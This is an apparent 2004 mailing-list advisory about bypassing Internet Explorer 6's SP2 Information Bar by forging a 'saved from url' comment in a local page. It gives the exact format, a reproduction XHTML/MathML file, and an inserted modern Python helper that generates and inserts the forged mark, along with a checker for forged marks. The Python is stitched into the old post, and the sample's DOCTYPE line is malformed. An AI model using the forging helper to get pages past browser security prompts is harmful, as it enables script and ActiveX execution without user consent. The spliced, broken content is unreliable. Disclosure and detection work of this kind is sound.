XP SP2 IE6 vulnerability

From: CnS (cns_at_free.fr)
Date: 09/16/04

Date: 15 Sep 2004 15:46:57 -0700

Background information

Windows XP Service Pack 2 has introduced new features that improve browsing
security in Internet Explorer. Most of them are additional messages that force
the user to validate everything the browser does, and most of these
messages are displayed in the new Information Bar. For example, if you try to
open a web page that contains JavaScript code or ActiveX objects, it is likely
that they will be blocked; the Information Bar then appears and offers to
reload the page with the untrusted components enabled.

More information can be found at:

The side effect of these features is that some web sites can't be used as
easily as before because the user has to respond to an increasing number
of notifications and questions.

Vulnerability Explained

As an example I created a simple XHTML document containing MathML and installed
the MathPlayer ActiveX plugin from DesignScience (http://www.dessci.com/en).
This type of document used to render correctly in IE6, but since SP2 was
installed the new features interfere with the loading of the component: the
page is first loaded without MathPlayer, which then has to be enabled via the
Information Bar.

But there seems to be a vulnerability in Internet Explorer that allows this
protection to be bypassed. All that needs to be done is to add a fake comment
between the DOCTYPE declaration and the <html> tag that mimics the one IE
itself adds when a page is saved to disk (the "Mark of the Web"). The fake
comment must be formatted as follows:

<!-- saved from url=(XXXX)URL -->

where URL is replaced by a URL (for instance http://www.example.com/) and
XXXX by a 4-digit, zero-padded integer giving the number of characters in
the URL (0023 for the example URL, which is 23 characters long). SP2 uses
this mark to evaluate a locally stored page in the security zone of the named
URL rather than in the locked-down Local Machine zone, which is why a forged
mark naming an Internet URL skips the Information Bar prompt.
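As an added example, not code from the original advisory, the following Python helper builds the "saved from url" comment from a URL, inserts it where the post says it must go (between the DOCTYPE and the <html> tag), and parses an existing one back out so the declared length can be checked against the URL it names. The sample document and the helper names are assumptions made for this example.

```python
import re

# Added example, not code from the original advisory. The helper names and the
# sample document below are assumptions made for this illustration.

# Matches the comment IE writes when saving a page: a 4-digit length, then the URL.
MOTW_RE = re.compile(
    r"<!--\s*saved from url=\((\d{4})\)(.*?)\s*-->",
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample page: a local XHTML file with inline script and no mark yet.
SAMPLE_XHTML = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>MOTW example</title></head>
<body><script type="text/javascript">alert("script ran");</script></body>
</html>
"""


def mark_of_the_web(url: str) -> str:
    """Return the 'saved from url' comment for `url`.

    The field in parentheses is the character count of the URL, zero-padded
    to four digits, exactly as the advisory describes it.
    """
    n = len(url)
    if not 0 < n < 10000:
        raise ValueError("URL length must fit in a 4-digit field")
    return "<!-- saved from url=(%04d)%s -->" % (n, url)


def parse_motw(document: str):
    """Return (declared_length, url, consistent) for the first mark, or None.

    `consistent` is False when the declared length disagrees with len(url);
    IE fills the length itself, so such a comment was not written by saving
    a page in the browser.
    """
    m = MOTW_RE.search(document)
    if m is None:
        return None
    declared = int(m.group(1))
    url = m.group(2)
    return declared, url, declared == len(url)


def insert_motw(document: str, url: str) -> str:
    """Insert the mark immediately before the <html> tag.

    Anything before <html> (XML prolog, DOCTYPE) is left in place. If the
    document has no <html> tag the mark is prepended instead; if it already
    carries a mark, refuse rather than produce two conflicting ones.
    """
    if parse_motw(document) is not None:
        raise ValueError("document already carries a 'saved from url' comment")
    comment = mark_of_the_web(url) + "\n"
    m = re.search(r"<html[\s>]", document, re.IGNORECASE)
    if m is None:
        return comment + document
    return document[: m.start()] + comment + document[m.start():]


if __name__ == "__main__":
    marked = insert_motw(SAMPLE_XHTML, "http://www.example.com/")
    print(marked)
    print(parse_motw(marked))
```

parse_motw is the check to run over HTML files found on a workstation or in a mail attachment: the length field is written by IE itself, so a comment whose declared length and URL disagree was hand-crafted, and one naming a URL the file was never fetched from is the pattern this advisory describes.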

System Affected

Windows XP Pro and Home editions with SP2
IE 6.0 (SP2)

How to reproduce

Install the plugin from DesignScience. Paste the following text into a file
with an .xml extension. Open it in IE twice: once with the "saved from url"
comment that follows the DOCTYPE in place, and once with that line removed.
Without the comment, MathPlayer is only enabled after the Information Bar is
answered; with it, the page renders immediately.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus MathML 2.0//EN"
<!-- saved from url=(0023)http://www.example.com/ -->
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE Vulnerability example</title></head>
<body>
<!-- MathML namespace written out: no entity named mathml is declared in this file -->
<math displaystyle="true" xmlns="http://www.w3.org/1998/Math/MathML">
<mi>x</mi>
</math>
</body>
</html>


This also works with pages containing Javascript code.